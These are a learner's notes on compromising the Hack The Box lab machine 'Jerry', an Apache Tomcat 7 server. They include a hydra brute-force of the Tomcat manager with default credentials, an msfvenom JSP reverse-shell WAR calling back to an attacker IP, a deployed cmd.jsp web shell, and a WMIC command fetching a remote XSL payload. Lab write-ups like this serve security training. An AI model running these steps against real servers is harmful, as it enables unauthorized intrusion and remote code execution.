HTB Write-Up Jerry Windows
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
cannot login to tomcat host manager page.
look for tomcat wordlist.
hydra -C lets you use the colon seperated text files.
hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.129.161.193:8000/manager/html
admin was false-positive.
generate a payload through msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.131 LPORT=5555 -f war > shell.war
We are already root!
Manual JSP shell - silent trendy - python
Get a JSP shell:
Follow the instruction for host method:
Additional tip, remove the war file that came with the package and make your own with:
zip cmd.war cmd.jsp
it will attach the war file to the cmd.jsp
Finally, host the file on http.
Go to manager/html page/ and deploy the cmd.war file.
Now when you go to the /cmd/cmd.jsp directory, we get a shell!!!
execute command with syntax cmd /c COMMAND
Go to server and start the st.py
do "listners" to set it as listner mode and "list" what we have
"use http" and set the BindIP
and start the listner!
Once you start do stgers > list > use wmic > generate http
Plug this value into our JSP shell.
C:\Windows\System32\wbem\WMIC.exe os get /format:"https://myurl/wmic.xsl"
create a new www directory and move the wmic.xsl there .
Since the tomcat requires a.js file, copy that over to the directory as well.
hmm didn't work. I'll come back to this.